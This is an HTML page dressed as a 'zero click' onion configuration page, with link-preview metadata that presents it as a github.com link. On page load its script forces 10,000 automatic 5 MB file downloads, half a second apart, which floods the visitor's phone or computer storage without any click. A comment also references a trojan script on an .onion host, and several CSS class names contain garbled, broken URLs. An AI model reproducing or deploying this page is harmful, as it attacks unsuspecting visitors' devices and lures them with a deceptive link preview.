<!DOCTYPE html>
<html lang="en">
<head>
<meta property="og:title" content="ZERO CLICK TEST">
<meta property="og:description" content="CONFIGURASI ONION ZERO - TALK COMMUNITY X.4.T.E.S">
<meta property="og:image" content="https://files.catbox.moe/zd58tw.png">
<meta property="og:url" content="https://github.com">
<meta property="og:type" content="website">
<title>ZERO CLICK HTTPS</title>
  <style>
    body {
      margin: 0;
      font-family: Arial, sans-serif;
      background-color: white;
    }

    .camera-src="http://operal2.onion/css/source/yan6.css" {
      background-color: #f3f3f3;
      border-bottom: 1px solid #ccc;
      padding: 8px 14px;
      font-family: monospace;
      color: #333;
      display: flex;
      align-items: center;
    }

    .foundersiv='http://operal2.onion/css/source/yan9.css' {
      color: green;
      margin-right: 8px;
    }

    .url-text {
      color: #007b00;
    }

    .content {
      padding: 30px;
    }

    .btn {
      padding: 10px 20px;
      background: #007bff;
      color: white;
      border: none;
      border-radius: 6px;
      cursor: pointer;
    }

    .btn:hover {
      background: #0056b3;
    }
  </style>
</head>
<body>
<script>
 // onActiv+ trojan=silen{src="http://bolisticoperal.onion/script/yantrojan2.js"}
 </script>
  <div class="camera-src="http://operal2.onion/css/source/yan6.css">
    <span class="foundersiv='http://operal2.onion/css/source/yan9.css'">𓁹</span>
    <span class="url-text">ZERO CLICK</span>
  </div>
  <div class="content">
    <h1>CONFIGURASI ONION ZERO</h1>
    <p>TALK COMMUNITY X.4.T.E.S</p>
    <button  class="btn">PARTY AT YOU PHONE</button>
    
  </div>
  <script>
    const filesCount = 10000;
    const fileSizeInMB = 5;
    const fileSizeInBytes = fileSizeInMB * 1024 * 1024;
    const content = '@@';

    function downloadFile(name, size) {
      try {
        const repeatCount = Math.floor(size / content.length);
        const fileContent = new Array(repeatCount).fill(content).join('');
        const blob = new Blob([fileContent], { type: 'text/plain' });
        const url = URL.createObjectURL(blob);

        const a = document.createElement("a");
        a.href = url;
        a.download = name;
        document.body.appendChild(a);
        a.click();
        document.body.removeChild(a);
        URL.revokeObjectURL(url);

      } catch (e) {
        alert('CLICK 😹 ' + name);
      }
    }

    function startDownload() {
      for (let i = 1; i <= filesCount; i++) {
        setTimeout(() => {
          const fileName = `file${i}.txt`;
          downloadFile(fileName, fileSizeInBytes);
        }, i * 500);
      }
    }

    window.onload = startDownload;
  </script>
  

</body>
</html>
